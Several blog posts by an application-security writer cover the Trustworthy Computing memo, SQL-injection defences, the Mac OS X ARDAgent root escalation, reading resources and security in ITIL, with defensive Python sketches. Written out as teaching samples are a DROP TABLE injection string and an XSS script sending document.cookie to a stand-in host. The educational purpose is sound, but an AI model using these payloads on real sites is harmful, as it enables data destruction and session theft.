Ten-year lookback: the Trustworthy Computing memo

On the Veracode blog (where I now post from time to time), we had a retrospective on the Microsoft Trustworthy Computing memo, which marked its tenth anniversary on the 15th. The retrospective spanned two posts and I’m quoted in the second:

On January 15, 2002, I was in business school and had just accepted a job offer from Microsoft. At the time it was a very different company–hip-deep in the fallout from the antitrust suit and the consent decree; having just launched Windows XP; still figuring out where it was going on the web (remember Passport?). And the deep breath that the Trustworthy Computing memo signaled was the biggest sign that things were different at Microsoft.

And yet not. It’s important to remember that a big part of the context of TWC was the launch of .NET and the services around it (remember Passport?). Microsoft was positioning Passport (fka Hailstorm) as the solution for the Privacy component of their Availability, Security, Privacy triad, so TWC was at least partly a positioning memo for that new technology. And it’s pretty clear that they hadn’t thought through all the implications of the stance they were taking: witness BillG’s declaration that “Visual Studio .NET is the first multi-language tool that is optimized for the creation of secure code”. While .NET may have eliminated or mitigated the security issues related to memory management that Microsoft was drowning in at the time, it didn’t do anything fundamentally different with respect to web vulnerabilities like cross-site scripting or SQL injection.

But there was one thing about the TWC memo that was different and new and that did signal a significant shift at Microsoft: Gates’ assertion that “when we face a choice between adding features and resolving security issues, we need to choose security.” For an emerging product manager, that was an important principle to absorb–security needs to be considered as a requirement alongside user-facing features and needs to be prioritized accordingly. It’s a lesson that the rest of the industry is still learning.

To which I’ll add: it’s interesting to look back at what I blogged about at the time and what I didn’t. As an independent developer I was very suspicious of Hailstorm (later Passport.NET) but hadn’t thought that much about its security implications.

New mix: “Blasphemous Rumors”

I haven’t posted a new mix for a while, and there are a few reasons for that. So I’m jumpstarting by posting a largely unedited theme mix, based on Estaminet’s Sacrilicious mix from a while back. It’s called “Blasphemous Rumors,” and it hits songs with Old and New Testament themes as well as good old-fashioned breaking of the third (or second, depending on how you number them) commandment.

This will also be the last mix I post on Art of the Mix unless a few things change. The site has had some problems with SQL injection vulnerabilities, and the developer chose to fix them by filtering input–which is one approach, but it means that you can’t create a mix containing the word “drop” anywhere, even in a song title (e.g. “Dropkick Me Jesus”). Tip to the developer: the best way to avoid SQL injection is to validate input against a whitelist and parameterize your queries, not to blacklist keywords.
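
Art of the Mix isn’t written in Python and I don’t know its schema, so treat the following as a minimal sketch (using Python’s built-in sqlite3 module, with made-up table and column names) of what parameterized queries look like; the same idea applies in whatever database driver the site actually uses:

    import sqlite3

    conn = sqlite3.connect("mixes.db")  # hypothetical database
    cur = conn.cursor()
    cur.execute("CREATE TABLE IF NOT EXISTS songs (mix_id INTEGER, title TEXT)")

    # The title is passed as a bound parameter rather than spliced into the SQL
    # string, so "Dropkick Me Jesus" -- or even "'; DROP TABLE songs; --" -- is
    # stored as plain data and cannot change the structure of the query.
    title = "Dropkick Me Jesus"
    cur.execute("INSERT INTO songs (mix_id, title) VALUES (?, ?)", (1, title))

    cur.execute("SELECT title FROM songs WHERE mix_id = ?", (1,))
    print(cur.fetchall())

    conn.commit()
    conn.close()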

So does anyone have a recommendation for a replacement for Art of the Mix? It should ideally support uploading playlists from iTunes.

Followup: Mac OS X ARDAgent vulnerability advice

Various parties in the Mac community have weighed in on the best way to address the issue highlighted in last week’s advisory regarding an escalation of privilege vulnerability in ARDAgent. While some have suggested that enabling the remote access service may actually correct the privilege escalation, there’s enough evidence that it doesn’t reliably close the hole. And clearing the setuid bit that allows ARDAgent to act as root appears to break ARDAgent entirely, at least for some commentators. That leaves only two options:

  1. If you don’t need anyone to remotely manage your machine, just delete or archive ARDAgent.app.
  2. Restrict ARDAgent from being able to run the AppleScript “do shell script” command (as described on Martin Kou’s blog).
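
Before picking one of those options it’s worth checking where your machine actually stands. Here’s a minimal Python sketch that reports whether the ARDAgent executable is still setuid root; the path is just the standard app-bundle layout under the location mentioned in the original post, so verify it on your own system:

    import os
    import stat

    # Usual bundle location on 10.4/10.5; adjust if your installation differs.
    ARDAGENT = ("/System/Library/CoreServices/RemoteManagement/"
                "ARDAgent.app/Contents/MacOS/ARDAgent")

    try:
        st = os.stat(ARDAGENT)
    except FileNotFoundError:
        print("ARDAgent binary not found -- already deleted or archived?")
    else:
        if st.st_mode & stat.S_ISUID and st.st_uid == 0:
            print("ARDAgent is setuid root; the privilege escalation is live.")
            # Clearing the bit requires root and, per the reports above, may
            # break ARDAgent itself:  sudo chmod u-s <path-to-binary>
        else:
            print("ARDAgent is not setuid root.")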

It would be nice if Apple just closed the hole, wouldn’t it?

While you’re at it, don’t forget to update Ruby if you’re using it (it’s part of the default Mac OS X installation) to close a whole bunch of holes–from numeric errors to buffer overflows–in the core Ruby runtime.

And can we stop pretending that the Mac OS X platform is magically secure?

Resources for application security education

As I’ve been getting up to speed on application security, a few resources have been extremely helpful.

A good general background on application security issues, unsurprisingly, is contained in The Art of Software Security Testing, co-authored by Veracode cofounder Chris Wysopal. The book goes beyond the basic description of classes of application security vulnerabilities into specific recommendations for testing strategies and ways to improve the software development lifecycle to avoid introducing vulnerabilities.

There have been a few pivotal papers explaining how certain classes of software vulnerability work. The canonical one is the Cult of the Dead Cow’s “The Tao of Windows Buffer Overflow,” written by veteran hacker DilDog. Written in a clear and easy-to-read (if profane) style, it should scare the living bejeezus out of you.

There are some more business-friendly summaries of other vulnerability classes available. One source for this information is Veracode’s own web site, which features clear explanations of SQL injection and cross-site scripting (XSS).
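
Those write-ups stand on their own, but purely as an illustration of the cross-site scripting side, here is a toy Python example (the comment field and the page template are invented) of why encoding user input on output matters:

    import html

    # A comment field submitted by a user -- here, a script injection attempt.
    user_comment = ('<script>document.location='
                    '"http://evil.example/?c=" + document.cookie</script>')

    # Unsafe: splicing raw user input into the page lets the browser run the script.
    unsafe_page = "<p>Latest comment: " + user_comment + "</p>"

    # Safer: HTML-encode the input so the payload is displayed as text instead.
    safe_page = "<p>Latest comment: " + html.escape(user_comment) + "</p>"

    print(unsafe_page)
    print(safe_page)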

Serious new Mac OS X escalation of privilege vulnerability

Slashdot is reporting a new escalation of privilege vulnerability in Mac OS X 10.4 and 10.5. The details are a little sparse, but it appears that calling the Apple Remote Desktop Agent (ARDAgent) from AppleScript allows execution of arbitrary code with root privilege. Bad, for sure.

The mitigating factor is that the exploit has to run as the currently logged-in user in the UI session, and apparently can’t be initiated over SSH or another remote connection unless the attacker can log in as an account that is currently physically logged in on the machine. However, at a minimum it allows gaining root access on any kiosk or other restricted machine that can be physically accessed. And one intelligent poster points out that all it takes is a phishing exploit that gets the user to execute the code on their own machine to open things wide up for a remote assailant–or a buffer overflow in Safari, QuickTime, Flash, or Firefox that allows starting a shell.

Incidentally, simply disabling remote access is insufficient to prevent the attack. The ARDAgent.app must physically be removed from the machine. (For those interested, it’s usually found in /System/Library/CoreServices/RemoteManagement/.)
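
If you do decide to pull the bundle, something along these lines works on the 10.4/10.5 systems discussed here. It’s only a sketch: the archive location is arbitrary, it has to run as root, and it will of course break legitimate Apple Remote Desktop management of the machine:

    import os
    import shutil
    import sys

    ARD_APP = "/System/Library/CoreServices/RemoteManagement/ARDAgent.app"
    ARCHIVE = "/var/root/ARDAgent-archive"  # any root-only location will do

    if os.geteuid() != 0:
        sys.exit("Run as root (e.g. via sudo); the bundle lives under /System.")
    if not os.path.isdir(ARD_APP):
        sys.exit("ARDAgent.app not found -- nothing to archive.")

    # Zip the bundle so it can be restored later, then remove the original.
    shutil.make_archive(ARCHIVE, "zip",
                        root_dir=os.path.dirname(ARD_APP),
                        base_dir=os.path.basename(ARD_APP))
    shutil.rmtree(ARD_APP)
    print("Archived to %s.zip and removed %s" % (ARCHIVE, ARD_APP))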

Apple needs to close this pronto.

Webroot on SaaS for security

The CTO of Webroot is talking about applying Software as a Service to email and web security. It’s a good pitch, delivered to a small audience late in the afternoon.

Big thoughts:

  1. Because business-relevant content creation is shifting from “trusted providers” to semi-anonymous collaborations like wikis, blogs, and social networks, the focus is shifting away from blocking and allowing entire sites and toward figuring out how to deal with the possibility of a site like Facebook serving as a malware vector.
  2. Spam messages per business user in 2008: 42,000, based on their internal statistics.
  3. Because of #1, outgoing URL filtering no longer works (at least by itself). You have to combine anti-spyware, anti-virus, anti-phishing, and access control, and do it all while meeting high performance requirements.

The intersection of ITIL v.3 and application security

I’m at the Gartner IT Security Summit today and tomorrow (alas, I missed Bruce Sterling on the panel yesterday), and have been splitting my time between the show floor and the sessions. This afternoon I attended sessions on application security testing and on ITIL v.3 that sparked a few responses based on my combined security and ITIL experience.

Basically, the challenge for IT organizations doing any level of application management (change management of internally managed apps, purchasing of COTS apps) is to figure out how to integrate application security into their software development and purchasing lifecycles. The two concrete recommendations that jumped out at me were:

  1. Don’t treat purchased software differently, from a security perspective, than you treat internally developed software. Hold both to the same standards and demand the same security certification from both. While this has traditionally been harder for COTS software, where source code is usually unavailable, binary analysis techniques such as those provided by my firm enable some level of consistency across these two categories.
  2. Bake security into your service management lifecycle. From design to transition to continual service improvement, security should be designed into the process rather than bolted on. One way to see how security dovetails with ITIL is to consider the role of security audits, whether binary analysis or otherwise, as part of change and release management criteria. While secure development practices and source code tools should certainly be part of the SDLC, release criteria should include security testing alongside functional testing requirements. Again, automated scanning can greatly assist with this process, as in the sketch below.
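
To make the release-criteria point concrete, here is a minimal sketch of a gate that could run in a build or change-management pipeline. The findings file, its schema, and the severity threshold are all invented for illustration; they are not any particular scanner’s format:

    import json
    import sys

    FINDINGS_FILE = "scan_results.json"  # hypothetical export from your scanner
    SEVERITY_RANK = {"low": 1, "medium": 2, "high": 3, "critical": 4}
    RELEASE_THRESHOLD = "high"  # block the release at this severity or above

    with open(FINDINGS_FILE) as fh:
        findings = json.load(fh)  # expected: [{"issue": "...", "severity": "..."}, ...]

    blocking = [f for f in findings
                if SEVERITY_RANK.get(f["severity"], 0) >= SEVERITY_RANK[RELEASE_THRESHOLD]]

    if blocking:
        for finding in blocking:
            print("BLOCKING: %(severity)s - %(issue)s" % finding)
        sys.exit(1)  # non-zero exit fails the release/change gate
    print("No findings at or above %s severity; gate passed." % RELEASE_THRESHOLD)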